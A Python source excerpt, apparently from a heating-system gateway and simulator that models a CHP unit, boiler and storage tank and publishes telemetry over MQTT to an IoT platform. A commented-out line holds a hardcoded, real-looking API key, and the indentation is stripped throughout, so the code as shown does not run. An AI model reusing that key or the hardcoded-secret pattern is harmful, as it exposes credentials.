def get_mstr_hk(self):
return self.heizkurve.get_design_mass_flow()
# ==================================================================
def get_mstr_chp(self):
return self.chp.get_mass_flow()
# ==================================================================
def get_mstr_gb(self):
return self.boiler.calc_mass_flow()
# ==================================================================
def get_el_prod_kWh(self, therm_prod_kWh):
return self.chp.get_el_prod_kWh(therm_prod_kWh)
# ==================================================================
def max_pred_temp_supply_heating_sys(self, t_a_min):
return self.heizkurve.get_supply_temperature(t_a_min)
# ==================================================================
def get_return_temperature(self, t_a_pred):
return self.heizkurve.get_return_temperature(t_a_pred)
# ==================================================================
def thermal_energy_that_can_be_got_from_storage(self, tmin):
return self.storage_tank.calc_energy_above_tmin(tmin)
# ==================================================================
# obsolete function - to delete after check
def get_temp_profile_in_storage(self):
return self.storage_tank.output_temperatures()
# ==================================================================
def get_slice_vol(self):
return self.storage_tank.get_slice_vol()
# ==================================================================
def get_max_thermal_rod_power(self):
return self.storage_tank.get_max_thermal_rod_power() # in kW
# ==================================================================
def get_max_th_tank_power(self):
return self.storage_tank.get_max_th_tank_power(self.t22) # in kW
# ==================================================================
def get_max_thermal_boiler_power(self):
return self.boiler.get_max_thermal_boiler_power() # in kW
# ==================================================================
def initialize_actual_time(self, real_time_send, start_sim_inh, end_sim_inh):
# def initialize_actual_time(self, simulation, end_sim_inh):
if real_time_send:
return datetime.now() # time in datetime format
else:
return (datetime.now() - timedelta(hours=(end_sim_inh - start_sim_inh))) # time in datetime format
#return (datetime.now() - timedelta(hours=end_sim_inh)) # time in datetime format
#end initialize_actual_time
# ==================================================================
def loop_condition(self, simulation, actual_time, end_datetime):
if simulation:
if actual_time > end_datetime:
return False
else:
return True
else:
return True
#end loop_condition
# ==================================================================
def update_time(self, simulation, platform, actual_time, tsm, real_time_send, sleep_time_in_s, time_step_in_s):
next_time_step = actual_time + timedelta(seconds=tsm.get_timestep())
#print('now = {}, next = {}'.format(datetime.now(), next_time_step))
if simulation:
if(platform):
if(real_time_send):
while datetime.now() < next_time_step:
sleep(0.1)
return datetime.now()
#sleep(time_step_in_s)
#return (next_time_step)
else:
sleep(sleep_time_in_s)
return (next_time_step)
else:
return (next_time_step)
else:
while datetime.now() < next_time_step:
sleep(1)
return datetime.now()
#end update_time
# ==================================================================
def get_heater_rod_status(self, simulation, el_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh):
""" returns the status between 0 = OFF and 1 = ON of the electrical rod heater """
if simulation:
# file based simulation - values are read from the file
# file based simulation - values are read from the file
# hour_of_year = 1
simtime = int(math.floor(((actual_time - start_datetime).seconds / (60.0 * 15.0)) + start_sim_inh * 60.0 / 15.0)) # simulationstime in quarters = 15 minutes slots
if (simtime >= 35040): # actual time exceeds the first year (there are 35 040 slots of 15 minutes in a year)
simtime = simtime - math.floor(simtime / 35040) * 35040
line1 = utils.get_significant_parts(el_load_file[simtime].rstrip().split(" "))
y1 = float(utils.get_ith_column(2, line1))
return y1 # as load from 0 to 1
else:
# real time calculation - values are received via MQTT? - dead for now
return 0
#end get_heater_rod_status
# ==================================================================
def get_dhw_minute_consumption(self, simulation, dhw_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh):
# returns the volume of dhw consumption read from file dhw_load_file in m3/s
# file dhw_load_file contains values in in dm3/min = liter/minute
# simulation - flag for real time or file based
# dhw_load_file - file with dhw consumption in litres resolved for 525600 minutes of the year = 8760 h/a * 60 min/h
# actual_time - the current time or current simulation time in the datetime format
# start_datetime - start of the calculations in datetime format
# start_sim_inh - only in simulation mode - the starting point of the simulation in hours - will be found in the wetter_file
# end_sim_inh - only in simulation mode - the end point of the simulation in hours - arbitrarily stated
nn = len(dhw_load_file) # = 525600 for the whole year
# file based simulation - values are read from the file
# hour_of_year = 1
simtime = int(math.floor(((actual_time - start_datetime).seconds / 60.0) + start_sim_inh * 60.0)) # simulationstime in minutes
if (simtime >= nn): # actual time exceeds the first year (there are 525 600 minutes in a year)
simtime = simtime - math.floor(simtime / nn) * nn
nn = len(dhw_load_file)
if(int(simtime) > nn):
simtime = int(simtime) % nn
minute = int(dhw_load_file[simtime])
return minute/60000.0 # in cubic meter per second = m3/s = dm3/min / (60 s/min * 1000 dm3/m39
#
#wyn = 0.0
#if((actual_time-start_datetime).seconds >= (3600.0 * 48.0)):
#wyn = minute / 60000.0 # in cubic meter per second = m3/s = dm3/min / (60 s/min * 1000 dm3/m3)
#return wyn
#end get_dhw_minute_consumption
# ==================================================================
def schedule_receiver(self, config_file_path):
#print('STARTED RECEIVER')
config_file = utils.check_and_open_json_file(config_file_path)
# mqtt
conf_plat = config_file['calculation']['platform_mode']
#mqtt_broker = conf_plat['mqtt_broker']
#mqtt_port_nr = conf_plat['mqtt_port_nr']
mqtt_api_key = conf_plat['mqtt_api_key']
mqtt_sensor_name = conf_plat['mqtt_sensor_name']
mqtt_attributes = conf_plat['mqtt_attributes']
mqtt_commands = conf_plat['mqtt_commands']
dbg_level = conf_plat['dbg_level']
#mqtt_client_name = 'rvk3'
#mqtt_client_name = conf_plat['mqtt_client_name_cmd']
#client = self.create_mqtt_client(mqtt_broker, mqtt_port_nr, mqtt_client_name) # creates mqtt client
#self.subscribe_to_schedule(self.mqtt_client, mqtt_api_key, mqtt_sensor_name, mqtt_commands) # subscribes to schedule topic
# wait for the simulator to initialize and setup the mqtt client
loop1 = True
if(dbg_level == 1):
print('[', end = '')
while loop1:
# when time settings arrive from platform, they set this flag to True
# see on_message and decode_schedule_from_ul_msg functions for cmd_type == 'time_sync'
if(self.mqtt_client_initialized):
loop1 = False
sleep(1)
if(dbg_level == 1):
print('.', end = '')
# take over the settings of the platform and implement them
if(dbg_level == 1):
print(']')
self.subscribe_to_schedule(self.mqtt_client, mqtt_api_key, mqtt_sensor_name, mqtt_commands) # subscribes to schedule topic
try:
if(dbg_level == 1):
print('RECEIVER starts looping == listening')
self.mqtt_client.loop_start() # listens for the schedule
self.receiver_on = True
if(dbg_level == 1):
print('self.receiver_on = {}'.format(self.receiver_on))
#self.mqtt_client.loop_forever() # listens for the schedule
except KeyboardInterrupt: # does not work for some unknown reason
utils.my_thread_kill()
except:
utils.my_thread_kill()
# end schedule_receiver
# ==================================================================
def demo_receiver(self, config_file_path):
print('STARTED DEMO RECEIVER')
config_file = utils.check_and_open_json_file(config_file_path)
# mqtt
conf_plat = config_file['calculation']['platform_mode']
mqtt_broker = conf_plat['mqtt_broker']
mqtt_port_nr = conf_plat['mqtt_port_nr']
dbg_level = conf_plat['dbg_level']
mqtt_client_name = config_file['calculation']['demonstrator_mode']['mqtt_client_name_receiver'] # rvk4
mqtt_topic = config_file['calculation']['demonstrator_mode']['mqtt_topic']
authentication = config_file['calculation']['demonstrator_mode']['authentication']['activate']
mqtt_username = config_file['calculation']['demonstrator_mode']['authentication']['mqtt_username']
mqtt_password = config_file['calculation']['demonstrator_mode']['authentication']['mqtt_password']
tls_connection = config_file['calculation']['demonstrator_mode']['authentication']['tls_connection']
loop1 = True
while loop1:
# when time settings arrive from platform, they set this flag to True
# see on_message and decode_schedule_from_ul_msg functions for cmd_type == 'time_sync'
if(self.mqtt_client_initialized):
loop1 = False
sleep(1)
client = self.create_mqtt_client2(mqtt_broker, mqtt_port_nr, mqtt_client_name, authentication, mqtt_username, mqtt_password, tls_connection) # creates mqtt client
client.subscribe(mqtt_topic) # subscribe
try:
#client.loop_forever() # listens for the schedule
if(dbg_level == 1):
print('DEMO RECEIVER at rvk starts looping == listening')
client.loop_start() # listens for the schedule
self.demo_on = True
# time.sleep(1)
except KeyboardInterrupt:
utils.my_thread_kill()
except:
utils.my_thread_kill()
# end demo_receiver
# ==================================================================
def is_platform_mode_on(self, config_file_path):
config_file = utils.check_and_open_json_file(config_file_path)
if(config_file['calculation']['mode'] == 'simulation'):
return False
elif(config_file['calculation']['mode'] == 'platform'):
return True
else:
print('EXCEPTION: wrong mode = {}'.format(config_file['calculation']['mode']))
return False
# end is_platform_mode_on
# ==================================================================
def is_demo_mode_on(self, config_file_path):
config_file = utils.check_and_open_json_file(config_file_path)
return config_file['calculation']['demonstrator_mode']['activated']
# ==================================================================
def main(self, config_file_path):
#config_file_path = './config.json'
print('main config_file_path = {}'.format(config_file_path))
thread1 = threading.Thread(target=self.simulator, args=(config_file_path,))
if(self.is_platform_mode_on(config_file_path)):
thread2 = threading.Thread(target=self.schedule_receiver, args=(config_file_path,))
if(self.is_demo_mode_on(config_file_path)):
thread3 = threading.Thread(target=self.demo_receiver, args=(config_file_path,))
# Will execute both in parallel
thread1.start()
if(self.is_platform_mode_on(config_file_path)):
thread2.start()
if(self.is_demo_mode_on(config_file_path)):
thread3.start()
# Joins threads back to the parent process, which is this program
thread1.join()
if(self.is_platform_mode_on(config_file_path)):
thread2.join()
if(self.is_demo_mode_on(config_file_path)):
thread3.join()
# end main
# ==================================================================
def simulator(self, config_file_path):
print('STARTED SIMULATOR')
# some configuration
arch_option_1 = True # True ==> create db gets asked in every timestep
arch_option_1 = False # False ==> create db gets asked only every three hours
# read in configuration file
config_file = utils.check_and_open_json_file(config_file_path)
# initialisation of objects and variables
(platform, simulation, time_step_in_s, record_step_in_s, start_sim_inh, end_sim_inh, wetter_file,
dhw_load_file, el_load_file, actual_time, F, tsm, tank, chp, kessel, cvalve, heizkurve, pred,
real_time_send, sleep_time_in_s, demonstrator, pred_res_in_s, powr_conf, heatc_conf,
multiple_gateways, provisioning_endpoint, device_id,
authentication, mqtt_username, mqtt_password, tls_connection, mqtt_topic_attr) = self.initialize_components(config_file)
# MQTT initialization
platform_client = 0
if(platform):
self.mqtt_client = self.create_mqtt_client(self.mqtt_broker, self.mqtt_port_nr, self.mqtt_client_name,
authentication, mqtt_username, mqtt_password, tls_connection) # creates mqtt client
self.mqtt_client_initialized = True
# end if(platform):
# provisioning and time management
if(multiple_gateways):
if(self.dbg == 1):
print('waiting for mqtt receiver to initialize')
if(not self.receiver_on):
loop1 = True
while loop1:
if(self.receiver_on):
if(demonstrator):
if(self.demo_on):
loop1 = False
else:
loop1 = False
sleep(1)
if(self.dbg == 1):
print('simulator sees self.receiver_on = {}'.format(self.receiver_on))
if(self.dbg == 1):
print('provisioning of gw: ')
#provisioning_endpoint = 'http://iot-agent:4041/iot/devices'
#provisioning_endpoint = "http://127.0.0.1:4041/iot/devices"
# provision device with the platform
# if the gateway has already been provisioned, you get an informative message but it does not spoil anything
utils.provision_rvk(device_id, device_id, "rvk", provisioning_endpoint)
# send initial data set consisting of actual_time and number 10.0 to the platform
# only this makes the crate db create the needed tables - which in turn makes its query possible
# db queries are needed for the rest of initialization
# (self.get_next_prediction_timestamp and self.pred.update_heat_consumption_from_crate in self.process_gw_on_platform)
utils.send_ini_data_to_platform(mqtt_topic_attr, 10.0, actual_time, self.mqtt_client)
# if the 'calculation' -> 'platform_mode' -> 'real_time_send' is false
# the time of gateway has to be synchronized with the time of the platform
# If it is true, every gateway can use its own clock as the differences
# are expected to be neither significant nor crucial for the operation
if(self.dbg == 1):
print('real_time_send = {}'.format(real_time_send))
if(not real_time_send):
# wait for the platform to send its time settings
loop1 = True
ijk = 0
if(self.dbg == 1):
print('{} self.time_data = {}'.format(ijk, self.time_data))
while loop1:
ijk = ijk + 1
# when time settings arrive from platform, they set this flag to True
# see on_message and decode_schedule_from_ul_msg functions for cmd_type == 'time_sync'
if(self.time_data['valid']):
loop1 = False
sleep(1)
if(self.dbg == 1):
print('Seconds left to undo provisioning and exit = {}; '.format(15 - ijk))
if(ijk > 15):
utils.undo_provisioning_and_exit(device_id, provisioning_endpoint)
# take over the settings of the platform and implement them
actual_time = self.time_data['actual_time']
start_sim_inh = self.time_data['start_time_in_h']
end_sim_inh = self.time_data['end_time_in_h']
self.next_sending_timestamp = actual_time + timedelta(seconds=self.send_intervall_in_s)
self.next_prediction_timestamp = actual_time + timedelta(seconds=self.prediction_time_step_in_s)
self.tsm.set_end_time(actual_time)
self.chp.reset_next_safe_turn_on(actual_time)
self.boiler.reset_next_safe_turn_on(actual_time)
self.storage_tank.update_act_time(actual_time)
self.current_schedule = self.initialize_schedule(actual_time)
if(self.dbg == 1):
print('self.time_data = {}'.format(self.time_data))
# end if(not real_time_send):
# else: # do nothing - both rvk and platform are using their system clocks and hopefully do not need to be synchronized
# end if(multiple_gateways):
# start standard calculation
ini_time_in_h = utils.convert_time_to_hours(actual_time)
last_record_time = actual_time # time in datetime format
print_time_in_h = 0
start_datetime = actual_time
end_datetime = actual_time + timedelta(hours=(end_sim_inh - start_sim_inh))
#end_datetime = actual_time + timedelta(hours=end_sim_inh)
print('actual_time = {} (in hours = {})'.format(actual_time,utils.convert_time_to_hours(actual_time)))
print('start_datetime = {} (in hours = {})'.format(start_datetime,utils.convert_time_to_hours(start_datetime)))
print('end_datetime = {} (in hours = {})'.format(end_datetime,utils.convert_time_to_hours(end_datetime)))
#print('simulation = {} platform = {}'.format(simulation,platform))
# header of permanent file with output data - stays there in all denug modes and all operaion modes
self.write_header_output_file(F)
print('modules initialized')
# stats of this simulation run
timestart = datetime.now()
# Martin's code - do I need this? TODO - yes, needed for instant initialization of schedule calculation - might be useful in demo mode
predict_thermal.file_name=open("./pred.txt","a")
# debug data
H = 0
if(self.dbg == 2):
H = open("{}/logrvk1.dat".format(self.dbg_path),"w")
G = 0
if(self.dbg == 2):
G = open("{}/mylog.dat".format(self.dbg_path),"w")
G.write(' all data sent from gateway.py to crate db \n')
G.write(' utc time stamp time_in_h \n')
if(self.dbg == 3):
sendstart = datetime.now()
# start main program loop
while self.loop_condition(simulation, actual_time, end_datetime):
# receive new schedule and realise it in practice
self.control_execute_schedule(actual_time)
# t_a
if(demonstrator and self.got_demo_data):
ambient_temp = self.tni - self.q_in_kW * self.coef # = t_ni - Q/Q_n * (t_ni - t_na)
self.got_demo_data = False
else:
ambient_temp = utils.get_ambient_temperature(simulation, wetter_file, actual_time, start_datetime, start_sim_inh, end_sim_inh)
self.t30 = ambient_temp
# dhw consumption
self.V_1 = self.get_dhw_minute_consumption(simulation, dhw_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh)
# cold water temperature
self.t22 = 10.0
# electrical rod heater:
# electricity consumption of "other" consumers
self.electricity_consumption_kWh = self.calc_el_cons_other(actual_time, powr_conf)
#el_heat_status = self.get_heater_rod_status(simulation, el_load_file, actual_time, start_datetime, start_sim_inh, end_sim_inh)
# status of electrical rod heater in the heat storage tank as double number from 0,0 to 1,0. (here "," is decimal sign)
el_heat_status = self.rod_stat
# time management
act_time_in_h = utils.convert_time_to_hours(actual_time)-ini_time_in_h
next_time_step = self.update_time(simulation, platform, actual_time, tsm, real_time_send, sleep_time_in_s, time_step_in_s)
real_dt_in_s = (next_time_step - actual_time).seconds
tank.update_act_time(act_time_in_h) # used only for debugging
# calculation
self.one_iteration_step(tsm, tank, chp, kessel, cvalve, heizkurve, ambient_temp, el_heat_status, actual_time, heatc_conf)
self.update_electricity_production_status(time_step_in_s, pred_res_in_s)
# output control
last_record_time = self.write_output_into_file(F, record_step_in_s, last_record_time, actual_time ,act_time_in_h ,ambient_temp ,chp ,kessel ,cvalve ,tank, tsm) # at the end of the timestep
# saving data for prediction algorithms
if(self.time_condition_for_sending_monitoring(actual_time)):
if(self.dbg == 3):
sendend = datetime.now()
#print('SENDING 2 plat in {}'.format(sendend - sendstart), end='')
print('SENDING 2 plat in {}'.format(sendend - sendstart))
sendstart = sendend
self.next_sending_timestamp = actual_time + timedelta(seconds=self.send_intervall_in_s)
if(platform):
self.send_data_to_platform(actual_time, act_time_in_h, chp, kessel, cvalve, tank, self.mqtt_client, G)
if(arch_option_1):
pred.update_heat_consumption_from_crate(actual_time, time_step_in_s, arch_option_1, device_id, 1)
else:
self.save_data_for_prediction(pred, act_time_in_h, ambient_temp)
######################### PLATFORM - BEGIN - 1 #################
# if(self.time_condition_for_prediction(actual_time, pred)):
# print('\n\n\n\nP R E D I C T I O N\n\n\n\n')
# if(self.dbg >= 2):
# G.flush()
# G.close()
#
# G = open("./mylog.dat","w")
# G.write(' all data sent from gateway.py to crate db \n')
# G.write(' utc time stamp time_in_h \n')
# print(' weather prediction')
# weather_pred = self.get_weather_prediction(actual_time, simulation, wetter_file, start_datetime, start_sim_inh, end_sim_inh)
# if(platform and (not arch_option_1)):
# print('get data from crate')
# pred.update_heat_consumption_from_crate(actual_time, time_step_in_s, arch_option_1, device_id, fnr)
# energy_vector = 0
# #elif(not platform):
# last_t_profile = tank.output_temperatures()
# energy_vector = pred.predict_energy_vector(weather_pred, act_time_in_h, actual_time, start_datetime, start_sim_inh, end_sim_inh, self.output_horizon_in_h, self.output_resolution_in_s, last_t_profile)
# self.send_or_save_energy_vector(actual_time, energy_vector, start_datetime, platform, platform_client)
######################### PLATFORM - END - 1 ###################
#if(self.dbg == 3):
# print(' time = {}'.format(actual_time))
# proceed to the next timestep
actual_time = next_time_step
flag_big_time_step = tsm.has_timestep_ended(actual_time) # redundant ?
# show progress at prompt
if((act_time_in_h-print_time_in_h) > 0.05 * (end_sim_inh - start_sim_inh)):
print_time_in_h = act_time_in_h
if(self.dbg != 3):
print('.', end = '', flush=True)
#if(not real_time_send):
# sleep(sleep_time_in_s)
# output to the file - end
# end while self.loop_condition
F.close()
if(self.dbg == 2):
G.close()
if(self.dbg == 2):
H.close()
# duration of the calculation
timeend = datetime.now()
print('\ncalculation took = {} seconds'.format(timeend - timestart))
#end simulator
# ==================================================================
def time_condition_for_sending_monitoring(self, actual_time):
if(actual_time >= self.next_sending_timestamp):
return True
else:
return False
# end time_condition_for_sending_monitoring
# ==================================================================
def time_condition_for_prediction(self, actual_time, pred):
if(actual_time >= self.next_prediction_timestamp):
if(pred.get_q_write()):
#print('now = {}; next time = {}'.format(actual_time, self.next_prediction_timestamp))
return True
return False
#end time_condition_for_prediction
# ==================================================================
def send_or_save_energy_vector(self, actual_time, energy_vector, start_datetime, platform, platform_client):
# send energy vector to platformcontroller and get the current schedule out of it
if(self.dbg==2):
H = open("./myenvec1.dat","w")
H.write(' energy vector sent from platform \n')
H.write(' date time utc_time time_in_h P_el_min_in_W P_el_max_in_W \n')
for ln in energy_vector:
H.write(' {} '.format(ln['time stamp']))
H.write(' {} '.format(ln['time stamp'].replace(tzinfo=timezone.utc).timestamp()))
H.write(' {} '.format(ln['time_in_h']))
H.write(' {} '.format(ln['P_el_min_in_W']))
H.write(' {} \n'.format(ln['P_el_max_in_W']))
H.close()
#
self.next_prediction_timestamp = actual_time + timedelta(seconds=self.prediction_time_step_in_s)
current_sched = platformcontroller.cloud_schedule_gen(actual_time, energy_vector, start_datetime)
if(self.dbg==2):
H = open("./myschedule1.dat","w")
H.write(' schedule sent from platform \n')
H.write(' timestep_in_s = {} \n'.format(current_sched['timestep_in_s']))
H.write(' active_schedule = {} \n'.format(current_sched['active schedule']))
H.write(' date time utc_time activation energy_production_in_W \n')
myvals = current_sched['values']
for ln in myvals:
H.write(' {} '.format(str(ln['time_stamp'])))
H.write(' {} '.format(ln['time_stamp'].replace(tzinfo=timezone.utc).timestamp()))
H.write(' {} '.format(str(ln['activation'])))
H.write(' {} \n'.format(ln['energy_production_in_W']))
H.close()
print('send_or_save_energy_vector : schedule written into myschedule1.dat')
if(platform):
platformcontroller.send_schedule_to_rvk(current_sched, platform_client)
else:
self.current_schedule = current_sched
self.schedule_changed = True
if((self.dbg == 2) or (self.dbg == 1)):
print('\n\n\n\n ========= CHANGE SCHEDULE ======================\n\n\n\n')
#end send_or_save_energy_vector
# ==================================================================
def request_weather_prediction_from_platform(self, actual_time):
# holder for Ilya
return list({'date':actual_time, 'time_in_h': 0.0, 'temp_in_C': 0.0})
#end request_weather_prediction_from_platform
# ==================================================================
def write_header_output_file(self, F):
F.write("# date time elapsed t_a t_1 t_2 t_3 t_4 t_5 t_6 t_7")
F.write(" t_8 t_9 t_10 t_11 t_12 t_13 t_14 t_15 t_16")
F.write(" t_17 t_18 t_19 t_20 t_21 t_22 t_23 t_24 t_25")
F.write(" t_26 t_27 t_28 t_29 t_30 V_1 v_2 V_3 V_4")
F.write(" Z_1 Z_2 Wh1 Wh2 Wh3 ")
F.write("chp boiler control_valve COLD mstr_dhw mstr_hw el_heater n_slice tstep_in_s \n")
F.write("# dd.mm.yyyy hh:mm:ss.micro_s h °C °C °C °C °C °C °C °C")
F.write(" °C °C °C °C °C °C °C °C °C")
F.write(" °C °C °C °C °C °C °C °C °C")
F.write(" °C °C °C °C °C m3/s m3/s m3/s m3/s")
F.write(" m3/s m3/s kW flag kg/s kg/s kW kW 0-1 kg/s kg/s 0-1 h s ")
F.write(" 0-1 0-1 0-1 '1-5 0-1 \n")
F.write("# date time elapsed t_a t_1 t_2 t_3 t_4 t_5 t_6 t_7")
F.write(" t_8 t_9 t_10 t_11 t_12 t_13 t_14 t_15 t_16")
F.write(" t_17 t_18 t_19 t_20 t_21 t_22 t_23 t_24 t_25")
F.write(" t_26 t_27 t_28 t_29 t_30 V_1 v_2 V_3 V_4")
F.write(" Z_1 Z_2 Wh1 Wh2 Wh3")
F.write(" chp boiler control_valve COLD mstr_dhw mstr_hw el_heater n_slice tstep_in_s ")
F.write("self.unload keep_chp_on keep_chp_off tank_state dhw_prod ")
F.write("d_1 d_2 d_3 d_4 d_5 d_6 d_7")
F.write(" d_8 d_9 d_10 d_11 d_12 d_13 d_14 d_15 d_16")
F.write(" d_17 d_18 d_19 d_20 ")
F.write("\n")
#end write_header_output_file
# ==================================================================
def write_output_into_file(self, F, record_step_in_s, last_record_time, actual_time, act_time_in_h, ambient_temp, chp, kessel, cvalve, tank, tsm):
[d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, d16, d17, d18, d19, d20] = tank.dhw_profile_temperatures()
if((actual_time - last_record_time).total_seconds() >= record_step_in_s):
F.write(" {} {} {}".format(actual_time,act_time_in_h,ambient_temp))
F.write(" {} {} {}".format(self.t1,self.t2,self.t3))
F.write(" {} {} {}".format(self.t4,self.t5,self.t6))
F.write(" {} {} {}".format(self.t7,self.t8,self.t9))
F.write(" {} {} {}".format(self.t10,self.t11,self.t12))
F.write(" {} {} {}".format(self.t13,self.t14,self.t15))
F.write(" {} {} {}".format(self.t16,self.t17,self.t18))
F.write(" {} {} {}".format(self.t19,self.t20,self.t21))
F.write(" {} {} {}".format(self.t22,self.t23,self.t24))
F.write(" {} {} {}".format(self.t25,self.t26,self.t27))
F.write(" {} {} {}".format(self.t28,self.t29,self.t30))
F.write(" {} {} {}".format(self.V_1,self.V_2,self.V_3))
F.write(" {} {} {}".format(self.V_4,self.Z_1,self.Z_2))
F.write(" {} {} {}".format(self.Wh1,self.Wh2,self.Wh3))
F.write(" {} {} {}".format(chp.get_status(),kessel.get_status(),cvalve.get_hub()))
F.write(" {} {} {}".format(self.too_cold,tank.get_mstr_dhw(),tank.get_mstr_hw()))
F.write(" {} {} {}".format(tank.get_el_heater_status(),tank.get_slice_wechsel_zeit_in_h(),tsm.get_timestep()))
F.write(" {} {} {}".format(int(self.unload),int(self.keep_chp_on),int(self.keep_chp_off)))
F.write(" {} {}".format(int(self.tank_state), int(self.dhw_prod)))
F.write(" {} {} {}".format(d1,d2,d3))
F.write(" {} {} {}".format(d4,d5,d6))
F.write(" {} {} {}".format(d7,d8,d9))
F.write(" {} {} {}".format(d10,d11,d12))
F.write(" {} {} {}".format(d13,d14,d15))
F.write(" {} {} {}".format(d16,d17,d18))
F.write(" {} {} ".format(d19,d20))
F.write(" \n")
#print('act_time= {}; last_rec = {}; Delta={}'.format(actual_time, last_record_time, (actual_time - last_record_time).total_seconds()))
last_record_time = actual_time
return last_record_time
#end write_output_into_file
# ==================================================================
def send_data_to_platform(self, actual_time, act_time_in_h, chp, kessel, cvalve, tank, client, G):
""" communication with platform - sends the set of monitoring data from RVK to the mqtt broker """
#columns = [" 'T' 'iteration'",
columns = ['iteration',
'T01_Sp01',
'T02_Sp02',
'T03_Sp03',
'T04_Sp04',
'T05_Sp05',
'T06_Sp06',
'T07_Sp07',
'T08_Sp08',
'T09_Sp09',
'T10_Sp10',
'T11_Sp11',
'T12_Sp12',
'T13_Sp13',
'T14_Sp14',
'T15_Sp15',
'T16_Sp16',
'T17_Sp17',
'T18_Sp18',
'T19_Sp19',
'T20_Sp20',
'T21_DomesticHotWater',
'T22_DomesticColdWater',
'T23_Supply_HeatingBeforeMixValve',
'T24_Return_HeatingCircuit',
'T25_Supply_HeatingCircuit',
'T26_Supply_CHPunit',
'T27_Return_CHPunit',
'T28_Supply_GasBoiler',
'T29_Return_GasBoiler',
'T30_AmbientAirTemperature',
'V01_ColdDrinkingWater',
'V02_HeatingCircuit',
'V03_CHPunit',
'V04_GasBoiler',
'Vgas01_MainMeter',
'Vgas02_CHPunit',
'Wh01_HeatSources',
'Wh02_HeaterRod',
'Wh03_MainMeter',
'chp_status',
'boiler_status',
'control_valve_hub',
'storage_tank_too_cold_status',
'mass_flow_dhw',
'mass_flow_heating_water',
'elctric_heater_status',
'turnover_time_of_one_seg_in_h']
xtime = actual_time.replace(tzinfo=timezone.utc).timestamp()
#myshft = 100000000.0
#x1 = float(int(xtime/myshft))
#x2 = float(int(xtime-x1*myshft))
#x3 = xtime - int(xtime)
(x1,x2,x3) = utils.decompose_utc_time_to_floats(xtime)
data_to_send = []
# data_to_send.append(actual_time.isoformat()) # 1
data_to_send.append(x2) # 1
#data_to_send.append(str(actual_time)) # 1
data_to_send.append(self.t1) # 2
data_to_send.append(self.t2) # 3
data_to_send.append(self.t3) # 4
data_to_send.append(self.t4) # 5
data_to_send.append(self.t5) # 6
data_to_send.append(self.t6) # 7
data_to_send.append(self.t7) # 8
data_to_send.append(self.t8) # 9
data_to_send.append(self.t9) # 10
data_to_send.append(self.t10) # 11
data_to_send.append(self.t11) # 12
data_to_send.append(self.t12) # 13
data_to_send.append(self.t13) # 14
data_to_send.append(self.t14) # 15
data_to_send.append(self.t15) # 16
data_to_send.append(self.t16) # 17
data_to_send.append(self.t17) # 18
data_to_send.append(self.t18) # 19
data_to_send.append(self.t19) # 20
data_to_send.append(self.t20) # 21
data_to_send.append(self.t21) # 22
data_to_send.append(self.t22) # 23
data_to_send.append(self.t23) # 24
data_to_send.append(self.t24) # 25
data_to_send.append(self.t25) # 26
data_to_send.append(self.t26) # 27
data_to_send.append(self.t27) # 28
data_to_send.append(self.t28) # 29
data_to_send.append(self.t29) # 30
data_to_send.append(self.t30) # 31
data_to_send.append(self.V_1) # 32
data_to_send.append(self.V_2) # 33
data_to_send.append(self.V_3) # 34
data_to_send.append(self.V_4) # 35
data_to_send.append(self.Z_1) # 36
data_to_send.append(self.Z_2) # 37
data_to_send.append(self.Wh1) # 38
data_to_send.append(self.Wh2) # 39
data_to_send.append(self.Wh3) # 40
data_to_send.append(chp.get_status()) # 41
data_to_send.append(kessel.get_status()) # 42
data_to_send.append(cvalve.get_hub()) # 43
data_to_send.append(self.too_cold) # 44
#data_to_send.append(tank.get_mstr_dhw()) # 45
#data_to_send.append(tank.get_mstr_hw()) # 46
#data_to_send.append(tank.get_el_heater_status()) # 47
data_to_send.append(x1) # 45
data_to_send.append(x2) # 46
data_to_send.append(x3) # 47
data_to_send.append(xtime) # 48
#data_to_send.append(actual_time.replace(tzinfo=timezone.utc).timestamp()) # 49 ==> 48
if(self.dbg == 2):
#G.write('{} {} {} {} {} {}\n'.format(actual_time.replace(tzinfo=timezone.utc).timestamp(), actual_time, act_time_in_h,x1,x2,x3))
#G.write('{} {} {} {} {} {}\n'.format(xtime, actual_time, act_time_in_h,x1,x2,x3))
G.write('{} {} {}\n'.format(xtime, actual_time, data_to_send))
#data_to_send.append(actual_time.replace(tzinfo=timezone.utc).timestamp()) # 49
#apiKey = 'QKAAbMxLbv5TfhFxjTv4lhw92m'
#sensor_name = 'urn:ngsi-ld:rvk:001'
#attributes = 'attrs'
apiKey = self.mqtt_api_key
sensor_name = self.mqtt_sensor_name
attributes = self.mqtt_attributes
topic = "/{}/{}/{}".format(apiKey, sensor_name, attributes)
#client = mqtt.Client('rvk')
#client.connect('mqtt-broker', port=1883, keepalive=60, bind_address="")
payloads = ['{}|{}'.format(c,d) for c, d in zip(columns, data_to_send)]
client.publish(topic,'|'.join(payloads))
if(self.dbg == 1):
print('published data to topic = {}'.format(topic))
#print(data_to_send)
#if(not real_time_send):
# sleep(sleep_time_in_s)
# end send_data_to_platform
# ==================================================================
def create_mqtt_client(self, broker, port_nr, client_name, authentication, mqtt_username, mqtt_password, tls_connection):
# my broker == endpoint of Stephan Wiemann
if(self.dbg == 1):
print('create client {}'.format(client_name))
client = mqtt.Client(client_name)
client.on_connect = self.on_connect
client.on_message = self.on_message
client.on_publish = self.on_publish
client.on_disconnect = self.on_disconnect
if(self.dbg == 1):
print('connect client {} to broker'.format(client_name))
if(authentication):
client.username_pw_set(mqtt_username, password=mqtt_password)
if tls_connection:
client.tls_set(tls_version=ssl.PROTOCOL_TLSv1_2)
client.tls_insecure_set(False)
client.connect(broker, port=port_nr, keepalive=60, bind_address="") # connect
return client
# end create_mqtt_client
# ==================================================================
def create_mqtt_client2(self, broker, port_nr, client_name, authentication, mqtt_username, mqtt_password, tls_connection):
if(self.dbg == 1):
print('DEMO create client {}'.format(client_name))
client = mqtt.Client(client_name)
client.on_connect = self.on_connect
client.on_message = self.on_message2
#client.on_publish = self.on_publish
client.on_disconnect = self.on_disconnect
if(self.dbg == 1):
print('DEMO connect client2 {} to broker'.format(client_name))
if(authentication):
client.username_pw_set(mqtt_username, password=mqtt_password)
if tls_connection:
client.tls_set(tls_version=ssl.PROTOCOL_TLSv1_2)
client.tls_insecure_set(False)
client.connect(broker, port=port_nr, keepalive=60, bind_address="") # connect
return client
# end create_mqtt_client2
# ==================================================================
def subscribe_to_schedule(self, client, apiKey, sensor_name, attributes):
